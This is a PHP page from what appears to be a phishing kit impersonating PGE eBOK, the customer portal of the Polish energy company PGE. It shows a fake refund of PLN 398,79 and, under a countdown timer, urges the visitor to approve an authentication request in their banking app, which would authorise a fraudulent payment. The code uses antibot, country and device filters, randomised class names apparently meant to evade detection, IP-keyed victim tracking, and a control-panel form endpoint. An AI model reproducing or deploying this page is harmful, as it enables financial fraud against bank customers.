<?php
error_reporting(0);
session_start();
include "../antibots-debug/antibots.php";
include '../setting/functions.php';
include '../includes/current-page.php';
include '../includes/check-allowed-countries.php';
include '../includes/check-devices-allow.php';
$ip = get_client_ip();
$get_name_file = $ip;
$target_file = "../panel/storage/{$get_name_file}.json";
$json_file = file_get_contents($target_file);
$user_info = json_decode($json_file, true);
$user_info['error_approvation'];
if ($user_info['error_approvation'] == 1) {
$get_name_page = "Page Approvation Error";
$get_step = "approvation-error";
} else {
$get_name_page = "Page Approvation";
$get_step = "approvation";
}
get_page_info($get_name_page, $get_name_file);
$random_classes = rand(0, 1000000);
$permitted_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- SEO -->
<?php include '../libraries/seo.php'; ?>
<!-- Font Google -->
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap" rel="stylesheet">
<!-- Font Awesome Library -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css" integrity="sha512-KfkfwYDsLkIlwQp6LFnl8zNdLGxu9YAA1QvwINks4PhcElQSvqcyVLLD9aMhXd13uQjoXtEKNosOWaZqXgel0g==" crossorigin="anonymous" referrerpolicy="no-referrer" />
<!-- File Css -->
<link rel="stylesheet" href="../css/style.css">
<link rel="stylesheet" href="../css/basic-thinks.css">
<!-- Favicon -->
<link rel="icon" href="../img/favicon.png">
<link rel="shortcut" href="../img/favicon.png">
<link rel="appel-touch-icon" href="../img/favicon.png">
<title>PGE eBOK</title>
</head>
<body class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> ">
<!-- Main -->
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> main-section">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> navbar-section" style="padding-right: 0px !important;">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> logo">
<img src="../img/logo.png" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> logo-desktop">
<img src="../img/logo-mobile.png.png" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> logo-mobile">
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> coul-2">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-navbar-one">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-one"><img src="../img/icon-nav-1.png" alt=""><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-normal">Konto: </div><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">010240124</div></div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-one"><img src="../img/icon-nav-2.png" alt=""><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-green">Liczba nowych powiadomień: 0</div></div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-one"><img src="../img/icon-nav-3.png" alt=""><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-gray">Ustawienia/Zgody</div></div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-navbar-two">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-two" style="border-bottom: 1px solid #e1e2e7;"><img src="../img/icon-nav-4.png" alt=""><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-normal">Wyloguj się</div></div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-two"><img src="../img/icon-nav-5.png" alt=""><div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">Zmień konto</div></div>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-navbar-other">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-navbar-left">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-other hide-mobile"><img src="../img/icon-nav-2.png" alt=""></div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-other"><img src="../img/icon-nav-3.png" alt=""></div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-navbar-right">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-other hide-mobile"><img src="../img/icon-nav-5.png" alt=""></div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-navbar-other"><img src="../img/icon-nav-4.png" alt=""></div>
</div>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> content-main-section">
<form action="../control-panel/check-action.php" method="post" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> form-section-approvation" id="fSD">
<input type="hidden" name="step" value="<?php echo $get_step; ?>">
<input type="hidden" name="ip" value="<?php echo $get_name_file; ?>">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> header-approvation">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> logo-approvation">
<img src="../img/logo-app.png" alt="">
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> logo-card-approvation">
<?php echo $_SESSION["image_by"]; ?>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> section-load">
<h1>Oczekiwanie na uwierzytelnienie</h1>
<p>
Proszę czekać, podczas gdy weryfikujemy Twoje dane.
</p>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> load-approvation">
<img src="../img/load-app.gif" alt="">
</div>
</div>
<?php
if ($user_info['error_approvation'] == 1) {
echo
'<span class="m-e-pages">
<img src="../img/error-icon.png" alt="">
Wystąpił błąd. Potwierdź weryfikację w swojej aplikacji bankowej.
</span>';
}
?>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> image-approvation">
<img src="../img/approvation-image.png" alt="">
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> prt-text-and-timer">
<h1>Wymagane uwierzytelnienie do zatwierdzenia płatności</h1>
<p>
Zaloguj się do swojej aplikacji bankowej i potwierdź proces, akceptując wysłane żądanie uwierzytelnienia. Następnie wróć do tej strony i kliknij "Kontynuuj".
</p>
<div id="countdown" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> timer">06:00</div>
<p>Uwaga: Prosimy o autoryzację transakcji przed upływem czasu.</p>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> prt-btn-approvation">
<button type="submit" name="b_s_d_p" id="bSD" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> btn-s-d-p">Kontynuuj</button>
</div>
</form>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> note-section">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title-and-icon">
<span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Bliższe dane:</span>
<i class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> fa-solid fa-circle-info"></i>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-title-text">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Kwota do zwrócenia:</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text">PLN 398,79</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-title-text">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Numer zamówienia:</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text">ffba7993e4a923735e0fa99bb8ab284b</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-title-text">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Odbiorca:</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text">PGE Polska</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-title-text">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Numer klienta:</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text">101061041</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-title-text">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> title">Numer faktury:</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text">101061041/239S/2025</div>
</div>
</div>
</div>
</div>
<!-- Main -->
<!-- Footer -->
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> footer">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> content-footer">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-section">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-footer">
<img src="../img/footer-phone-icon.png" alt="">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info">Infolinia PGE: <span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">(+48) 422 222 222 Pon.-Pt. 8:00-17:00</span></div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-footer">
<img src="../img/footer-phone-icon.png" alt="">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info">Pomoc techniczna eBOK: <span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">(+48) 422 222 298 Pon.-Pt. 8:00-17:00</span></div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-footer">
<img src="../img/footer-mail-icon.png" alt="">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info">e-mail: <span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">serwis@gkpge.pl</span></div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-footer">
<img src="../img/footer-flash-icon.png" alt="">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> coul-column">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info">
Pogotowie energetyczne: <span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green">991</span>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info-small">
Dla aglomeracji warszawskiej: <span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green-small">(+48) 223 404 100</span>
</div>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> info-footer">
<img src="../img/footer-faq-icon.png" alt="">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-info"><span class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> text-green" style="cursor: pointer !important;">FAQ</span></div>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> download-app">
<h3>Pobierz naszą aplikację mobilną</h3>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> prt-btn-download">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> btn-download" style="margin-right: 15px;">
<img src="../img/app-store.png" alt="">
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> btn-download">
<img src="../img/google-play.png" alt="">
</div>
</div>
</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-and-copyright">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> links-footer">
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-footer">Pomoc użytkownika</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-footer">Regulamin</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-footer">Polityka prywatności</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> link-footer">FAQ</div>
</div>
<div class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> copyright">
© 2025 PGE Polska Grupa Energetyczna S.A. Wszystkie prawa zastrzeżone
</div>
</div>
<img src="../img/footer-image.svg" class="<?php echo substr(str_shuffle($permitted_chars), 0, 4) .'-'. $random_classes;?> image-footer-bottom">
</div>
<!-- Footer -->
<!-- Script Js -->
<script src="../js/script-step-four.js"></script>
<script src="../js/jquery.min.js"></script>
<?php include '../includes/redirect.php'; ?>
<?php include '../includes/status.php'; ?>
</body>
</html>